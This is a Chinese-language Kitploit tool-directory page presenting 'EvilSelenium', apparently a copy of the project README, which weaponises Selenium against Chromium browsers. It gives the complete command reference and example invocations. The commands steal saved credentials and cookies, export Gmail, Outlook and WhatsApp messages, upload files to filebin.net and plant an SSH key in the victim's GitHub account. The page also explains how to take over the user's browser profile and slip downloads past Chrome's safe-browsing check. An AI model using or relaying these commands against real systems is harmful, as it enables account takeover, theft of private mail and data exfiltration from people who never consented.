Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
EvilSelenium — 将 Selenium 武器化,用于自动实现 Chromium 浏览器的凭证窃取、Cookie 转储、电子邮件外发和文件提取,服务于红队行动。 | Kitploit
工具/GitHubGitHub/mrd0x/evilselenium
钓鱼工具数据泄露信息收集后渗透利用社会工程学红队
GitHubmrd0x/evilselenium

EvilSelenium

将 Selenium 武器化,用于自动实现 Chromium 浏览器的凭证窃取、Cookie 转储、电子邮件外发和文件提取,服务于红队行动。

查看仓库
6059344年前Kitploit 审核通过

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

EvilSelenium

EvilSelenium 是一个新项目,旨在武器化 Selenium 以滥用基于 Chromium 的浏览器。当前功能包括:

  • 窃取已保存的凭据(通过自动填充)
  • 窃取 Cookie
  • 对网站进行截图
  • 导出 Gmail/O365 邮件
  • 导出 WhatsApp 消息
  • 下载并外传文件
  • 向 GitHub 添加 SSH 密钥

或者扩展现有功能以满足您的需求(例如,从用户的 GDrive/OneDrive 下载文件)。

注意

  1. 运行此工具时,它会终止任何现有的浏览器进程,以便能够使用包含密码和活动会话的用户浏览器配置文件。

  2. 我在大约一周内构建了这个工具,并且没有进行足够的测试,因此可能存在一些错误。

  3. Selenium 模块并非总是稳定。由于网站不断变化,某些模块偶尔会失效。我会尽力维护现有模块以确保它们按预期工作,但您已收到警告。

用法

root@kitploit:~
EvilSelenium.exe /?

/help - 显示此帮助菜单。

设置:
/install - 安装 chromedriver 和 Selenium webdriver。运行一次即可。

全局:(可与每个命令一起使用)
/browserdir [appdata_local_routing] - 使用自定义浏览器,输入应为 %appdatalocal% 目录内的路径(例如 "Microsoft\Edge")

侦察:
/enumsavedsites [out_path] - 通过截图检查哪些网站保存了密码。
/screenshot [website] [out_path] - 截取指定网页的截图。

凭据:
/autorun - 从常见网站提取已保存的凭据。
/dynamicid [login_page] [username_id] [password_id] - 从网站提取已保存的凭据,提供用户名字段 ID 和密码字段 ID。
/dynamicname [login_page] [username_name] [password_name] - 从网站提取已保存的凭据,提供用户名字段的 name 值和密码字段的 name 值。
/dynamicname2 [login_page] [username_position] [password_position] [username_name] [password_name] - 从网站提取已保存的凭据,提供用户名字段的 name 值、密码字段的 name 值及其位置。

Cookie:
/cookies [website] - 获取指定网站的 Cookie。

模块:
/download [file_url] [seconds] - 下载文件并指定等待下载完成的时间。文件扩展名不应为可执行文件。
/exfil [local_file] [seconds] - 将文件上传到 filebin.net 并输出下载链接。
/gmail [out_path] [num_of_emails] - 从 mail.google.com 获取邮件(如果用户已认证)。最多 50 封邮件。
/outlook [out_path] [num_of_emails] - 从 Outlook 获取邮件(如果用户已认证)。
/o365 [out_path] [num_of_emails] - 从 O365 Outlook 获取邮件(如果用户已认证)。
/github [key] - 将您的 SSH 密钥添加到 GitHub(如果用户已认证)。
/whatsapp [out_path] - 获取 WhatsApp 消息(如果用户已认证,测试版)。

设置

/install 命令将下载 Chrome Driver 和 Selenium WebDriver,它们是必需的依赖项。EvilSelenium 适用于 Chrome 版本 100-90。

已在 Windows 10、Chrome v97 和 v90 上测试。

root@kitploit:~
EvilSelenium.exe /install

全局配置

默认情况下,EvilSelenium 会尝试使用 Google Chrome 的用户数据文件夹来检索数据,但其他基于 Chromium 的浏览器也受支持。
要使用不同的基于 Chrome 的浏览器,您需要在 %localappdata% 目录中添加 /browserdir 以及浏览器的路径。 以下是一些常见浏览器的示例(应将其添加到任何 CLI 命令中):

  1. Brave - /browserdir BraveSoftware\Brave-Browser
  2. Microsoft Edge - /browserdir Microsoft\Edge
  3. Vivaldi - /browserdir Vivaldi

侦察模块

/enumsavedsites - 此命令将对 chrome://settings/passwords 进行截图

/screenshot - 截取任何网站的截图。如果用户已认证到该网站,则您将获得经过认证的截图 :)。

凭据模块

重要提示: 凭据模块将删除 Cookie 以从自动填充中窃取凭据。理想情况下,如果您想导出 Cookie,应最后使用凭据模块。

/autorun - 针对常见网站的预构建模板。我会继续添加更多模板。

/dynamicid - 提供登录 URL 以及用户名字段的 ID 和密码字段的 ID。相当于 document.getElementById()。

/dynamicname - 如果字段没有 ID,则提供字段的 name 值。它会选择 name 值中的第一个索引。相当于 document.getElementsByName()[0].value。

/dynamicname2 - 提供字段的 name 值及其索引位置。相当于 document.getElementsByName()[x].value,其中 x 是提供的位置。

Cookie 模块

/cookies - 从指定网站导出 Cookie。

其他模块

这些是额外构建的模块,用于演示您可以使用 Selenium 执行的各种操作。

/download - 下载文件并指定等待下载完成的时间。应在文件扩展名前附加非可执行文件扩展名,以避免 Chrome 的安全浏览提示。

/exfil - 将文件上传到 filebin.net 并指定等待上传完成的时间。上传完成后,将写入文件的下载链接。

/gmail - 从 mail.google.com 获取邮件(如果用户已认证)。最多 50 封邮件。

/outlook - 从 Outlook 获取邮件(如果用户已认证)。

/o365 - 从 O365 Outlook 获取邮件(如果用户已认证)。

/github - 将您的 SSH 密钥添加到 GitHub(如果用户已认证)。

/whatsapp - 获取 WhatsApp 消息(如果用户已认证,测试版)。

示例命令

root@kitploit:~
EvilSelenium.exe /screenshot https://mail.google.com c:\users\mr.d0x\downloads

EvilSelenium.exe /dynamicid https://www.hybrid-analysis.com/login login_email login_password

EvilSelenium.exe /dynamicname https://linkedin.com session_key session_password

演示

示例

支持

  • 在 Twitter 上关注我 @mrd0x
  • BTC 钱包:38ApE9ciNHiXzEaQExLXdwM6TrEpz2wCUi(显然是为了买咖啡)
下载工具